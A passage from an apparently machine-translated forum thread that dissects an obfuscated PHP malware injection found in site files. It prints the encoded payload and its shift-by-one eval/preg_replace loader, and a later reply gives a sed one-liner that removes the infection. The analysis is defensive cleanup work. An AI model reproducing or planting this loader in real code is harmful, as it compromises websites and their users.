!*#ojneb#-*f\x5c\x7825)sf\x5c\x7878pmpusut)tpqssutRe\x5c\x7825)Rd\x5c\x7825)Rb\x5c\x7825))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT\x5c\x7860QIQ&f_UTPI\x5c\x7860QUUI&e_SEEB\x5c\x7860FUPNFS&d_SFSFGFS\x5c\x7860QUUI&c_UOFHB\x5c\x7860SFTV\x5c\x7860QUUI&b\x5c\x7825!|!*)323zbek!~!<b\x5c\x7825\x5c\x787f!<X>b\x5c\x7825Z<#opo#>b\x5c\x7825!*##>>X)!gjZ<#opo#>b\x5c\x7825!**X)ufttj\x5c\x7822)gj!|!*nbsbq\x5c\x7825)323ldfidk!~!<**qp\x5c\x7825!-uyfu\x5c\x7825)3of)fepdof\x5c\x786057ftbc\x5c\x787f!|!*uyfu\x5c\x7827k:!ftmf!}Z;^nbsbq\x5c\x7825\x5c\x785cSFWSFT\x5c\x7860\x5c\x7825}X;!sp!*#opo#>>}R;msv}.;\x5c\x782f#\x5c\x782f#\x5c\x782f},;#-#}+;\x5c\x7825-qp\x5c\x7825)54l}\x5c\x7827;\x5c\x7825!<*#}_;#)323ldfid>}&;!osvufs}\x5c\x787f;!opjudovg}k~~9{d\x5c\x7825:osvufs:~928>>\x5c\x7822:ftmbg39*56A:>:8:|:7#6#)tutjyf\x5c\x7860439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm\x5c\x7825:-5ppde:4:|:**#ppde#)tutjyf\x5c\x78604\x5c\x78223}!+!<+{e\x5c\x7825+*!*+fepdfe{h+{d\x5c\x7825)+opjudovg+)!gj+{e\x5c\x7825!osvufs!*!+A!>!{e\x5c\x7825)!>>\x5c\x7822!ftmbg)!gj<*#k#)usbut\x5c\x7860cpV\x5c\x787f\x5c\x787f\x5c\x787f\x5c\x787f<u\x5c\x7825V\x5c\x7827{ftmfV\x5c\x787f<*X&Z&S{ftmfV\x5c\x787f<*XAZASV<*w\x5c\x7825)ppde>u\x5c\x7825V<#65,47R25,d7R17,67R37,#\x5c\x782fq\x5c\x7825>U<#16,47R57,27R66,#\x5c\x782fq\x5c\x7825>2q\x5c\x7825<#g6R85,67R37,18R#>q\x5c\x7825V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w\x5c\x7825)kV\x5c\x7878{**#k#)tutjyf\x5c\x7860\x5c\x7878\x5c\x7822l:!}V;3q\x5c\x7825}U;y]}R;2]},;osvufs}\x5c\x7827;mnui}&;zepc}A;~!}\x5c\x787f;!|!}{;)gj}l;33bq}k;opjudovg}\x5c\x7878;0]=])0#)U!\x5c\x7827{**u\x5c\x7825-#jt0}Z;0]=]0#)2q\x5c\x7825l}S;2-u\x5c\x7825!-#2#\x5c\x782f#\x5c\x7825#\x5c\x782f#o]#\x5c\x782f*)323zbe!-#jt0*?]+^?]_\x5c\x785c}X\x5c\x7824<!\x5c\x7825tzw>!#]y76]277]y72]265]y39]274]y85]273]y6g]273]y76]271]y7d]252]y74]256]y39]252]y83]273]y72]282#<!\x5c\x7825tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<\x5c\x7825tmw!>!#]y84]275]y83]273]y76]277#<\x5c\x7825t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!\x5c\x7825tww!>!\x5c\x782400~:<h\x5c\x7825_t\x5c\x7825:osvufs:~:<*9-1-r\x5c\x7825)s\x5c\x7825>\x5c\x782fh\x5c\x7825:<**#57]38y]47]67y]37]88y]27]28y]#\x5c\x782fr\x5c\x7825\x5c\x782fh\x5c\x7825)n\x5c\x7825-#+I#)q\x5c\x7825:>:r\x5c\x7825:|:**t\x5c\x7825)m\x5c\x7825=*h\x5c\x7825)m\x5c\x7825):fmji\x5c\x7878:<##:>:h\x5c\x7825:<#64y]552]e7y]#>n\x5c\x7825<#372]58y]472]37y]672]48y]#>s\x5c\x7825<#462]47y]252]18y]#>q\x5c\x7825<#762]67y]562]38y]572]48y]#>m\x5c\x7825:|:*r\x5c\x7825:-t\x5c\x7825)3of:opjudovg<~\x5c\x7824<!\x5c\x7825o:!>!\x5c\x78242178}527}88:}334}472\x5c\x7824<!\x5c\x7825mm!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!\x5c\x7825ff2!>!bssbz)\x5c\x7824]25\x5c\x7824-\x5c\x7824-!\x5c\x7825\x5c\x7824-\x5c\x7824*!|!\x5c\x7824-\x5c\x7824\x5c\x785c\x5c\x7825j^\x5c\x7824-\x5c\x7824tvctus)\x5c\x7825\x5c\x7824-\x5c\x7824b!>!\x5c\x7825yy)#}#-#\x5c\x7824-\x5c\x7824-tusqpt)\x5c\x7825z-#:#*\x5c\x7824-\x5c\x7824!>!tus\x5c\x7860sfqmbdf)\x5c\x7825\x5c\x7824-\x5c\x7824y4\x5c\x7824-\x5c\x7824]y8\x5c\x7824-\x5c\x7824]26\x5c\x7824-\x5c\x7824<\x5c\x7825j,,*!|\x5c\x7824-\x5c\x7824gvodujpo!\x5c\x7824-\x5c\x7824y7\x5c\x7824-\x5c\x7824*<!\x5c\x7824-\x5c\x7824gps)\x5c\x7825j>1<\x5c\x7825j=tj{fpg)\x5c\x7825\x5c\x7824-\x5c\x7824*<!~!dsfbuf\x5c\x7860gvodujpo)##-!#~<#\x5c\x782f\x5c\x7825\x5c\x7824-\x5c\x7824!>!fyqmpef)#\x5c\x7824*<!\x5c\x7825kj:!>!#]y3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y4c#<!\x5c\x7825t::!>!\x5c\x7824Ypp3)\x5c\x7825cB\x5c\x7825iN}#-!tussfw)\x5c\x7825c*W\x5c\x7825eN+#Qi\x5c\x785c1^W\x5c\x7825c!>!\x5c\x7825i\x5c\x785c2^<!Ce*[!\x5c\x7825cIjQeTQcOc\x5c\x782f#00#W~!Ydrr)\x5c\x7825r\x5c\x7878Bsfuvso!sboepn)\x5c\x7825epnbss-\x5c\x7825r\x5c\x7878W~!Ypp2)\x5c\x7825zB\x5c\x7825z>!tussfw)\x5c\x7825zW\x5c\x7825h>EzH,2W\x5c\x7825wN;#-Ez-1H*WCw*[!\x5c\x7825rN}#QwTW\x5c\x7825hIr\x5c\x785c1^-\x5c\x7825r\x5c\x785c2^-\x5c\x7825hOh\x5c\x782f#00#W~!\x5c\x7825t2w)##Qtjw)#]82#-#!#-\x5c\x7825tmw)\x5c\x7825tww**WYsboepn)\x5c\x7825bss-\x5c\x7825r\x5c\x7878B\x5c\x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-\x5c\x7878r.985:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#\x5c\x782f#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<\x5c\x7825tpz!>!#]D6M7]K3#<\x5c\x7825yy>#]D6]281L1#\x5c\x782f#M5]DgP5]D6#<\x5c\x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<\x5c\x7825tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<\x5c\x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<\x5c\x7825bG9}:}.}-}!#*<\x5c\x7825nfd>\x5c\x7825fdy<Cb*[\x5c\x7825h!>!\x5c\x7825tdz)\x5c\x7825bbT-\x5c\x7825bT-\x5c\x7825hW~\x5c\x7825fdy)##-!#~<\x5c\x7825h00#*<\x5c\x7825nfd)##Qtpz)#]341]88M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]234]342]58]24]31#-\x5c\x7825tdz*Wsfuvso!\x5c\x7825bss\x5c\x785csboe))1\x5c\x782f35.)1\x5c\x782f14+9**-)1\x5c\x782f2986+7**^\x5c\x782f\x5c\x7825r\x5c\x7878<~!!\x5c\x7825s:N}#-\x5c\x7825o:W\x5c\x7825c:>1<\x5c\x7825b:>1<!gps)\x5c\x7825j:>1<\x5c\x7825j:=tj{fpg)\x5c\x7825s:*<\x5c\x7825j:,,Bjg!)\x5c\x7825j:>>1*!\x5c\x7825b:>1<!fmtf!\x5c\x7825b:>\x5c\x7825s:\x5c\x785c\x5c\x7825j:.2^,\x5c\x7825b:<!\x5c\x7825c:>\x5c\x7825s:\x5c\x785c\x5c\x7825j:^<!\x5c\x7825w\x5c\x7860\x5c\x785c^>Ew:Qb:Qc:W~!\x5c\x7825z!>2<!gps)\x5c\x7825j>1<\x5c\x7825j=6[\x5c\x7825ww2!>#p#\x5c\x782f#p#\x5c\x782f\x5c\x7825z<jg!)\x5c\x7825z>>2*!\x5c\x7825z>3<!fmtf!\x5c\x7825z>2<!\x5c\x7825ww2)\x5c\x7825w\x5c\x7860TW~\x5c\x7824<\x5c\x78e\x5c\x78b\x5c\x7825mm)\x5c\x7825\x5c\x7878:-!\x5c\x7825tzw\x5c\x782f\x5c\x7824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*\x5c\x7824\x5c\x782f\x5c\x7825kj:-!OVMM*<(<\x5c\x78e\x5c\x78b\x5c\x7825ggg!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!\x5c\x7825ggg)(0)\x5c\x782f+*0f(-!#]y76]277]y72]265]y39]271]y83]256]y78]248]y83]256]y81]265]y72]254]y76]61]y33]68]y34]68]y33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]82]y76]62]y3:]84#-!OVMM*<\x22\51\x29\51\x29\73", NULL); }
Теперь после eval () интерпретирует escape-последовательности:
if((function_exists("ob_start") && (!isset($GLOBALS["anuna"])))) { $GLOBALS["anuna"]=1; function fjfgg($n){return chr(ord($n)-1);} @error_reporting(0); preg_replace("/(.*)/e","eval(implode(array_map("fjfgg",str_split("\x25u:f!>!(\x25\x78:!>#]y3g]61]y3f]63]y3:]68]y76#<\xe\xb\x25w:!>!\x246767~6<Cw6<pd\x25w6Z6<.5\x60hA\x27pd\x256<pd\x25w6Z6<.4\x60hA\x27pd\x256<pd\x25w6Z6<.3\x60hA\x27pd\x256<pd\x25w6Z6<.2\x60hA\x27pd\x256<C\x27pd\x256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf\x27*&7-n\x25)utjm6<\x7fw6*CW&)7gj6<*K)ftpmdXA6~6<u\x257>\x2f7&6|7**111127-K)ebfsX\x27u\x25)7fmji\x786<C\x27&6<*rfs\x257-K)fujs\x78X6<#o]o]Y\x257;utpI#7>\x2f7rfs\x256<#o]1\x2f20QUUI7jsv\x257UFH#\x27rfs\x256~6<\x7fw6<*K)ftpmdXA6|7**197-2qj\x257-K)udfoopdXA\x22)7gj6<*QDU\x60MPT7-NBFSUT\x60LDPT7-UFOJ\x60GB)fubfsdXA\x27K6<\x7fw6*3qj\x257>\x2272qj\x25)7gj6<**2qj\x25)hopm3qjA)qj3hopmA\x273qj\x256<*Y\x25)fnbozcYufhA\x272qj\x256<^#zsfvr#\x5cq\x257\x2f7#@#7\x2f7^#iubq#\x5cq\x25\x27jsv\x256<C>^#zsfvr#\x5cq\x257**^#zsfvr#\x5cq\x25)ufttj\x22)gj6<^#Y#\x5cq\x25\x27Y\x256<.msv\x60ftsbqA7>q\x256<\x7fw6*\x7f_*#fubfsdXk5\x60{66~6<&w6<\x7fw6*CW&)7gj6<*doj\x257-C)fepmqnjA\x27&6<.fmjgA\x27doj\x256<\x7fw6*\x7f_*#fmjgk4\x60{6~6<tfs\x25w6<\x7fw6*CWtfs\x25)7gj6<*id\x25)ftpmdR6<*id\x25)dfyfR\x27tfs\x256<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv\x257-MSV,6<*)ujojR\x27id\x256<\x7fw6*\x7f_*#ujojRk3\x60{666~6<&w6<\x7fw6*CW&)7gj6<.[A\x27&6<\x7fw6*\x7f_*#[k2\x60{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd\x60ufh\x60fmjg}[;ldpt\x25}K;\x60ufldpt}X;\x60msvd}R;*msv\x25)}.;\x60UQPMSVD!-id\x25)uqpuft\x60msvd},;uqpuft\x60msvd}+;!>!}\x27;!>>>!}_;gvc\x25}&;ftmbg}\x7f;!osvufs}w;*\x7f!>>\x22!pd\x25)!gj}Z;h!opjudovg}{;#)tutjyf\x60opjudovg)!gj!|!*msv\x25)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j\x25-bubE{h\x25)sutcvt)fubmgoj{hA!osvufs!~<3,j\x25>j\x25!*3!\x27!hmg\x25!)!gj!<2,*j\x25!-#1]#-bubE{h\x25)tpqsut>j\x25!*72!\x27!hmg\x25)!gj!<2,*j\x25-#1]#-bubE{h\x25)tpqsut>j\x25!*9!\x27!hmg\x25)!gj!~<ofmy\x25,3,j\x25>j\x25!<**3-j\x25-bubE{h\x25)sutcvt-#w#)ldbqov>*ofmy\x25)utjm!|!*5!\x27!hmg\x25)!gj!|!*1?hmg\x25)!gj!<**2-4-bubE{h\x25)sutcvt)esp>hmg\x25!<12>j\x25!|!*#91y]c9y]g2y]#>>*4-1-bubE{h\x25)sutcvt)!gj!|!*bubE{h\x25)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf\x60opjudovg\x22)!gj}1~!<2p\x25\x7f!~!<##!>!2p\x25Z<^2\x5c2b\x25!>!2p\x25!*3>?*2b\x25)gpf{jt)!gj!<*2bd\x25-#1GO\x22#)fepmqyfA>2b\x25!<*qp\x25-*.\x25)euhA)3of>2bd\x25!<5h\x25\x2f#0#\x2f*#npd\x2f#)rrd\x2f#00;quui#>.\x25!<***f\x27,*e\x27,*d\x27,*c\x27,*b\x27)fepdof.)fepdof.\x2f#@#\x2fqp\x25>5h\x25!<*::::::-111112)eobs\x60un>qp\x25!|Z~!<##!>!2p\x25!|!*!***b\x25)sf\x78pmpusut!-#j0#!\x2f!**#sfmcnbs+yfeobz+sfwjidsb\x60bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!\x2f!#0#)idubn\x60hfsq)!sp!*#ojneb#-*f\x25)sf\x78pmpusut)tpqssutRe\x25)Rd\x25)Rb\x25))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT\x60QIQ&f_UTPI\x60QUUI&e_SEEB\x60FUPNFS&d_SFSFGFS\x60QUUI&c_UOFHB\x60SFTV\x60QUUI&b\x25!|!*)323zbek!~!<b\x25\x7f!<X>b\x25Z<#opo#>b\x25!*##>>X)!gjZ<#opo#>b\x25!**X)ufttj\x22)gj!|!*nbsbq\x25)323ldfidk!~!<**qp\x25!-uyfu\x25)3of)fepdof\x6057ftbc\x7f!|!*uyfu\x27k:!ftmf!}Z;^nbsbq\x25\x5cSFWSFT\x60\x25}X;!sp!*#opo#>>}R;msv}.;\x2f#\x2f#\x2f},;#-#}+;\x25-qp\x25)54l}\x27;\x25!<*#}_;#)323ldfid>}&;!osvufs}\x7f;!opjudovg}k~~9{d\x25:osvufs:~928>>\x22:ftmbg39*56A:>:8:|:7#6#)tutjyf\x60439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm\x25:-5ppde:4:|:**#ppde#)tutjyf\x604\x223}!+!<+{e\x25+*!*+fepdfe{h+{d\x25)+opjudovg+)!gj+{e\x25!osvufs!*!+A!>!{e\x25)!>>\x22!ftmbg)!gj<*#k#)usbut\x60cpV\x7f\x7f\x7f\x7f<u\x25V\x27{ftmfV\x7f<*X&Z&S{ftmfV\x7f<*XAZASV<*w\x25)ppde>u\x25V<#65,47R25,d7R17,67R37,#\x2fq\x25>U<#16,47R57,27R66,#\x2fq\x25>2q\x25<#g6R85,67R37,18R#>q\x25V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w\x25)kV\x78{**#k#)tutjyf\x60\x78\x22l:!}V;3q\x25}U;y]}R;2]},;osvufs}\x27;mnui}&;zepc}A;~!}\x7f;!|!}{;)gj}l;33bq}k;opjudovg}\x78;0]=])0#)U!\x27{**u\x25-#jt0}Z;0]=]0#)2q\x25l}S;2-u\x25!-#2#\x2f#\x25#\x2f#o]#\x2f*)323zbe!-#jt0*?]+^?]_\x5c}X\x24<!\x25tzw>!#]y76]277]y72]265]y39]274]y85]273]y6g]273]y76]271]y7d]252]y74]256]y39]252]y83]273]y72]282#<!\x25tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<\x25tmw!>!#]y84]275]y83]273]y76]277#<\x25t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!\x25tww!>!\x2400~:<h\x25_t\x25:osvufs:~:<*9-1-r\x25)s\x25>\x2fh\x25:<**#57]38y]47]67y]37]88y]27]28y]#\x2fr\x25\x2fh\x25)n\x25-#+I#)q\x25:>:r\x25:|:**t\x25)m\x25=*h\x25)m\x25):fmji\x78:<##:>:h\x25:<#64y]552]e7y]#>n\x25<#372]58y]472]37y]672]48y]#>s\x25<#462]47y]252]18y]#>q\x25<#762]67y]562]38y]572]48y]#>m\x25:|:*r\x25:-t\x25)3of:opjudovg<~\x24<!\x25o:!>!\x242178}527}88:}334}472\x24<!\x25mm!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!\x25ff2!>!bssbz)\x24]25\x24-\x24-!\x25\x24-\x24*!|!\x24-\x24\x5c\x25j^\x24-\x24tvctus)\x25\x24-\x24b!>!\x25yy)#}#-#\x24-\x24-tusqpt)\x25z-#:#*\x24-\x24!>!tus\x60sfqmbdf)\x25\x24-\x24y4\x24-\x24]y8\x24-\x24]26\x24-\x24<\x25j,,*!|\x24-\x24gvodujpo!\x24-\x24y7\x24-\x24*<!\x24-\x24gps)\x25j>1<\x25j=tj{fpg)\x25\x24-\x24*<!~!dsfbuf\x60gvodujpo)##-!#~<#\x2f\x25\x24-\x24!>!fyqmpef)#\x24*<!\x25kj:!>!#]y3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y4c#<!\x25t::!>!\x24Ypp3)\x25cB\x25iN}#-!tussfw)\x25c*W\x25eN+#Qi\x5c1^W\x25c!>!\x25i\x5c2^<!Ce*[!\x25cIjQeTQcOc\x2f#00#W~!Ydrr)\x25r\x78Bsfuvso!sboepn)\x25epnbss-\x25r\x78W~!Ypp2)\x25zB\x25z>!tussfw)\x25zW\x25h>EzH,2W\x25wN;#-Ez-1H*WCw*[!\x25rN}#QwTW\x25hIr\x5c1^-\x25r\x5c2^-\x25hOh\x2f#00#W~!\x25t2w)##Qtjw)#]82#-#!#-\x25tmw)\x25tww**WYsboepn)\x25bss-\x25r\x78B\x25h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-\x78r.985:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#\x2f#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<\x25tpz!>!#]D6M7]K3#<\x25yy>#]D6]281L1#\x2f#M5]DgP5]D6#<\x25fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<\x25tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<\x25G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<\x25bG9}:}.}-}!#*<\x25nfd>\x25fdy<Cb*[\x25h!>!\x25tdz)\x25bbT-\x25bT-\x25hW~\x25fdy)##-!#~<\x25h00#*<\x25nfd)##Qtpz)#]341]88M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]234]342]58]24]31#-\x25tdz*Wsfuvso!\x25bss\x5csboe))1\x2f35.)1\x2f14+9**-)1\x2f2986+7**^\x2f\x25r\x78<~!!\x25s:N}#-\x25o:W\x25c:>1<\x25b:>1<!gps)\x25j:>1<\x25j:=tj{fpg)\x25s:*<\x25j:,,Bjg!)\x25j:>>1*!\x25b:>1<!fmtf!\x25b:>\x25s:\x5c\x25j:.2^,\x25b:<!\x25c:>\x25s:\x5c\x25j:^<!\x25w\x60\x5c^>Ew:Qb:Qc:W~!\x25z!>2<!gps)\x25j>1<\x25j=6[\x25ww2!>#p#\x2f#p#\x2f\x25z<jg!)\x25z>>2*!\x25z>3<!fmtf!\x25z>2<!\x25ww2)\x25w\x60TW~\x24<\xe\xb\x25mm)\x25\x78:-!\x25tzw\x2f\x24)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*\x24\x2f\x25kj:-!OVMM*<(<\xe\xb\x25ggg!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!\x25ggg)(0)\x2f+*0f(-!#]y76]277]y72]265]y39]271]y83]256]y78]248]y83]256]y81]265]y72]254]y76]61]y33]68]y34]68]y33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]82]y76]62]y3:]84#-!OVMM*<"))));", NULL); }
Здесь есть еще одна запутанность: все полезные данные смещены на 1 (действительные символы на 1 символ меньше, чем вы видите в полезных данных); вот почему функция fjfgg создается и вся строка проходит через него implode(array_map('fjfgg', str_split($payload))),
На данный момент я достиг предела размера поста, что, вероятно, является достаточно хорошим признаком того, что я зашел слишком далеко. Просто продолжайте переходить к следующему шагу, но всегда не забывайте eval()это просто интерпретировать входные данные как строки и выводить выходные данные. Вы не хотите запускать этот код ни при каких обстоятельствах.
Другие решения
Я знаю, что это устаревшее сообщение, но вот мой сценарий для удаления этой (и других, начинающихся с определенных последовательностей символов) инфекции:
find . -name "*.php" -print0 | xargs -0 sed -ri '1s/^<\?php if\(!isset\(\$GLOBALS\[.*-1; \?>//' *.php
Я использовал это без проблем, дайте мне знать
Симона
detector